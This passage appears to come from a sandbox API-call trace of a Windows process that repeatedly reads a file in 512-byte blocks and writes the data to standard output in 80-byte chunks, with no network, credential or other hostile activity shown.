out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.904] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) 
returned 1 [0092.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.904] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.905] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.905] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, 
lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.906] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.906] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.908] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.908] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, 
lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.909] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.909] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, 
lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.910] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.910] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.911] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.911] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: 